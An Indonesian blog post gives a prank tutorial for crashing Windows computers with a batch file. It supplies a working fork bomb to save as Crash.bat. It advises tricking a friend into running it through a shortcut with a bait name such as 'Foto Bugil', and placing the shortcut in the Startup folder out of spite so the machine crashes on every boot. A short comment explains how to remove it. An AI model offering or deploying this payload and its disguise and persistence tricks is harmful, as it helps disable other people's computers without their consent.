Membuat Hang/Crash Komputer Dengan Batch File


Nah sekarang kita belajar berbuat jail :D, sesuai dengan judul di atas yaitu membuat hang komputer. Tau gag hang!? He he he klo ada yang blom tau hang tu kondisi dimana komputer tidak merespon atau bengong tanpa bisa diapa-apain, :D penjelasan yang sangat sederhana kan, namanya juga orang Gap-Tech yaaa cuma begitu deh bisanya.
Ehem gimana kita membuat komputer hang/crash? Ya kita penuhin aja dengan banyaknya program yang dijalankan, lama-lama juga RAM dah ngga nampung trus hang/crash deh :D. Pertama-tama buka Notepad dari start menu, dan ketikkan/ copy-pastekan script di bawah ini!

:s
start %0
goto :s


Klo dah pilih File> Save As> Pilih All Files> Simpan dengan nama Crash.bat, sebenernya simpan dengan nama apa aja si juga boleh asal ujungnya .bat aja :).

Tips setan :v:
* Klo mo isengin temen tapi cuma sekali bikin Shortcut di desktop ganti iconnya dan rename shortcutnya dengan nama "Seru Lho" atau nama-nama lain yang menarik misal lagi deh "Foto Bugil" :D.
** Nah ini klo dendam sama temen ada cara satu lagi yang bikin bingung (klo ngga tw :D). Sama bikin shortcut juga tapi di taronya di Start Menu> All Programs> Startup taronya di drag aja shortcutnya sampai ketujuan. Maksudnya biar script yang tadi kita tulis akan ikut startup komputer, efeknya pas komputer dinyalakan script langsung aktif dan membuat komputer hang/crash. Begitu terus sampai... hmmm ngga tau juga sampai kapan!!! :D

Hihihi... trik ini gw dapetin bwt iseng, pas lagi bengong tau-tau "Ting!!!" :t eh malah ide jahat yang keluar :v

Related Posts by Categories



2 komentar:

Anonim mengatakan...

klo bwt ngobatin or netralin or nyembuhiny or benerinny gimna?

ArdeeX mengatakan...

Klo bwt nyembuhinnya ada banyak cara c, salah satunya:
1. Klo RAMnya kecil kan keburu hang kompienya, jd mending di boot aja pk bootable device (apa aja, terserah), trus apus filenya manual, bisa juga c pk OS live on cd/UFD.
2. Tinggal apus StartUpnya restart kompie nya dech...
3. Masih banyak cara lain, asal Kreatif aja
:D :D :D

Posting Komentar